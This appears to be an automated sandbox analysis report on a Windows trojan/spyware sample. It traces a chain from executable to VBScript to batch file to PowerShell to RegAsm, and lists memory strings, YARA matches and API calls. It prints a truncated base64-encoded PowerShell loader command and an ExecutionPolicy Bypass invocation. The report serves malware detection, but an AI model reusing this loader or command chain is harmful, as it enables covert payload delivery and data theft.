Source: RegAsm.exe, 00000006.00000002.1861566390.0000000003226000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id24
Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id3
Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id4
Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id4ResponseD
Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id5
Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: RegAsm.exe, 00000006.00000002.1861566390.000000000301E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id5ResponseD
Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id6
Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id6ResponseD
Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id7
Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: RegAsm.exe, 00000006.00000002.1861566390.000000000301E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id7ResponseD
Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id8
Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id8ResponseD
Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id9
Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: RegAsm.exe, 00000006.00000002.1861566390.000000000301E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id9ResponseD
Source: powershell.exe, 00000005.00000002.1713760985.00000000054B6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: RegAsm.exe, 00000006.00000002.1871174162.0000000004404000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.00000000034E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1871174162.0000000004420000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.000000000344D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.0000000003485000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000005.00000002.1719342950.000000000650F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1739228665.0000000008BD5000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: https://aka.ms/binaryformatter
Source: powershell.exe, 00000005.00000002.1719342950.000000000650F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1739228665.0000000008BD5000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: https://aka.ms/dotnet-warnings/
Source: powershell.exe, 00000004.00000002.1648760741.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1713760985.0000000005361000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000005.00000002.1719342950.000000000650F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1739228665.0000000008BD5000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: https://aka.ms/serializationformat-binary-obsolete
Source: powershell.exe, 00000005.00000002.1719342950.0000000006DDA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1719342950.000000000650F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1857321756.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ip.sb/ip
Source: RegAsm.exe, 00000006.00000002.1871174162.0000000004404000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.00000000034E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1871174162.0000000004420000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.000000000344D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.0000000003485000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RegAsm.exe, 00000006.00000002.1871174162.0000000004404000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.00000000034E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1871174162.0000000004420000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.000000000344D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.0000000003485000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RegAsm.exe, 00000006.00000002.1871174162.0000000004404000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.00000000034E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1871174162.0000000004420000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.000000000344D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.0000000003485000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000005.00000002.1719342950.00000000063CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.1719342950.00000000063CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.1719342950.00000000063CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: RegAsm.exe, 00000006.00000002.1871174162.0000000004404000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.00000000034E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1871174162.0000000004420000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.000000000344D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.0000000003485000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RegAsm.exe, 00000006.00000002.1871174162.0000000004420000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.0000000003485000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RegAsm.exe, 00000006.00000002.1871174162.0000000004404000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.00000000034E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.000000000344D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtabS
Source: RegAsm.exe, 00000006.00000002.1871174162.0000000004404000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.00000000034E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1871174162.0000000004420000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.000000000344D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.0000000003485000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000005.00000002.1713760985.00000000054B6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.1650352774.0000000005EEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1719342950.00000000063CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: RegAsm.exe, 00000006.00000002.1871174162.0000000004404000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.00000000034E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1871174162.0000000004420000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.000000000344D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.0000000003485000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: RegAsm.exe, 00000006.00000002.1871174162.0000000004404000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.00000000034E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1871174162.0000000004420000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.000000000344D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.0000000003485000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: C:\Users\user\Desktop\f6FauZ2CEz.exe | Code function: 0_2_0040571B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File created: C:\Users\user\AppData\Local\Temp\Tmp20B6.tmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File created: C:\Users\user\AppData\Local\Temp\Tmp20D7.tmp

                          System Summary

Source: Process Memory Space: powershell.exe PID: 1188, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7184, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\SysWOW64\cmd.exe | Process created: Commandline size = 3918
Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\temp.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\QJHJap.ps1"
Source: C:\Users\user\Desktop\f6FauZ2CEz.exe | Code function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\f6FauZ2CEz.exe | Code function: 0_2_00406DC6
Source: C:\Users\user\Desktop\f6FauZ2CEz.exe | Code function: 0_2_0040759D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_0169DC74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_05536948
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_05537C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_05530040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_05530006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_05537C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_068567D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_0685A3E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_06856FE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_06856FF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_0685A3D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_07ACD3D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_07ACF310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_07ACA018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_07AC0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_07AC0D88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_07AC5D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_07ACF301
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_07AC9AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_07ACD8E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_07ACD8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_07ACBD98
Source: f6FauZ2CEz.exe, 00000000.00000000.1609063966.0000000000445000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameDocLink.exe0 vs f6FauZ2CEz.exe
Source: f6FauZ2CEz.exe | Binary or memory string: OriginalFilenameDocLink.exe0 vs f6FauZ2CEz.exe
Source: f6FauZ2CEz.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Process Memory Space: powershell.exe PID: 1188, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7184, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winEXE@13/15@0/1
Source: C:\Users\user\Desktop\f6FauZ2CEz.exe | Code function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\f6FauZ2CEz.exe | Code function: 0_2_004049C7 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
Source: C:\Users\user\Desktop\f6FauZ2CEz.exe | Code function: 0_2_004021AF CoCreateInstance
Source: C:\Users\user\Desktop\f6FauZ2CEz.exe | File created: C:\Users\user\start.vbs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1020:120:WilError_03
Source: C:\Users\user\Desktop\f6FauZ2CEz.exe | File created: C:\Users\user\AppData\Local\Temp\nsaFFA2.tmp
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\temp.bat" "
Source: C:\Users\user\Desktop\f6FauZ2CEz.exe | Process created: C:\Windows\SysWOW64\wscript.exe "wscript.exe" "C:\Users\user\start.vbs"
Source: f6FauZ2CEz.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\Desktop\f6FauZ2CEz.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\f6FauZ2CEz.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: f6FauZ2CEz.exe | Virustotal: Detection: 9%
Source: C:\Users\user\Desktop\f6FauZ2CEz.exe | File read: C:\Users\user\Desktop\f6FauZ2CEz.exe
Source: unknown | Process created: C:\Users\user\Desktop\f6FauZ2CEz.exe "C:\Users\user\Desktop\f6FauZ2CEz.exe"
Source: C:\Users\user\Desktop\f6FauZ2CEz.exe | Process created: C:\Windows\SysWOW64\wscript.exe "wscript.exe" "C:\Users\user\start.vbs"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\temp.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KIyAiVGhlIHN1cmVzdCB3YXkgdG8gY29ycnVwdCBhIHlvdXRoIGlzIHRvIGluc3RydWN0IGhpbSB0byBob2xkIGluIGhpZ2hlciBlc3RlZW0gdGhvc2Ugd2hvIHRoaW5rIGFsaWtlIHRoYW4gdGhvc2Ugd2hvIHRoaW5rIGRpZmZlcmVudGx5LiINCiMgIkluIGhlYXZlbiwgYWxsIHRoZSBpbnRlcmVzdGluZyBwZW9wbGUgYXJlIG1pc3NpbmcuIg0KIyAiSGUgd2hvIGhhcyBhIHdoeSB0byBsaXZlIGNhbiBiZWFyIGFsbW9zdCBhbnkgaG93LiINCiMgIlRvIGxpdmUgaXMgdG8gc3VmZmVyLCB0byBzdXJ2aXZlIGlzIHRvIGZpbmQgc29tZSBtZWFuaW5nIGluIHRoZSBzdWZmZXJpbmcuIg0KIyAiV2l0aG91dCBtdXNpYywgbGlmZSB3b3VsZCBiZSBhIG1pc3Rha2UuIg0KDQoNCmZ1bmN0aW9uIFJldmVyc2VTdHJpbmcoJGlucHV0U3RyaW5nKSB7DQogICAgJGNoYXJBcnJheSA9ICRpbnB1dFN0cmluZy5Ub0NoYXJBcnJheSgpDQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0NCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheQ0KICAgIHJldHVybiAkcmV2ZXJzZWRTdHJpbmcNCn0NCiMgIlRoZXJlIGlzIGFsd2F5cyBzb21lIG1hZG5lc3MgaW4gbG92ZS4gQnV0IHRoZXJlIGlzIGFsc28gYWx3YXlzIHNvbWUgcmVhc29uIGluIG1hZG5lc3MuIg0KIyAiVGhhdCB3aGljaCBkb2VzIG5vdCBraWxsIHVzIG1ha2VzIHVzIHN0cm9uZ2VyLiINCg0KZnVuY3Rpb24gQ2xvc2UtUHJvY2VzcyB7DQogICAgcGFyYW0oDQogICAgICAgIFtzdHJpbmddJFByb2Nlc3NOYW1lDQogICAgKQ0KDQogICAgJHByb2Nlc3MgPSBHZXQtUHJvY2VzcyAtTmFtZSAkUHJvY2Vzc05hbWUgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWUNCg0KICAgIGlmICgkcHJvY2VzcyAtbmUgJG51bGwpIHsNCiAgICAgICAgU3RvcC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRm9yY2UNCgl9DQp9DQojICJJbiBpbmRpdmlkdWFscywgaW5zYW5pdHkgaXMgcmFyZTsgYnV0IGluIGdyb3VwcywgcGFydGllcywgbmF0aW9ucywgYW5kIGVwb2NocywgaXQgaXMgdGhlIHJ1bGUuIg0KIyAiVGhlIG1hbiBvZiBrbm93bGVkZ2UgbXVzdCBiZSBhYmxlIG5vdCBvbmx5IHRvIGxvdmUgaGlzIGVuZW1pZXMgYnV0IGFsc28gdG8gaGF0ZSBoaXMgZnJpZW5kcy4iDQojICJBIHRoaW5rZXIgc2VlcyBoaXMgb3duIGFjdGlvbnMgYXMgZXhwZXJpbWVudHMgYW5kIHF1ZXN0aW9ucyDigJQgYXMgYXR0ZW1wdHMgdG8gZmluZCBvdXQgc29tZXRoaW5nLiBTdWNjZXNzIGFuZCBmYWlsdXJlIGFyZSBmb3IgaGltIGFuc3dlcnMgYWJvdmUgYWxsLiINCg0KZnVuY3Rpb24gQ05WKCRhcnIpeyANCiAgICAkbz0xMjM7IA0KICAgICRkPSRudWxsOyANCiAgICBmb3JlYWNoKCRpIGluICRhcnIpeyANCiAgICAgICAgaWYgKCRpIC1ndCAxMjcpIHsgDQogICAgICAgICAgICAkZCs9IFtjaGFyXSgkaS0kbykgDQogICAgICAgIH0gZWxzZSB7IA0KICAgICAgICAgICAgJGQrPSBbY2hhcl0oJGkrJG8pIA0KICAgICAgICB9IA0KICAgIH0gDQogICAgcmV0dXJuICRkIA0KfQ0KDQoNCiRlbmNvZGVkQXJyYXkgPSBAKDE1OSwyMjAsMjM4
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\QJHJap.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\f6FauZ2CEz.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\f6FauZ2CEz.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\f6FauZ2CEz.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\f6FauZ2CEz.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\f6FauZ2CEz.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\f6FauZ2CEz.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\f6FauZ2CEz.exe | Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\f6FauZ2CEz.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\f6FauZ2CEz.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\f6FauZ2CEz.exe | Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\f6FauZ2CEz.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\f6FauZ2CEz.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\f6FauZ2CEz.exe | Section loaded: wldp.dll
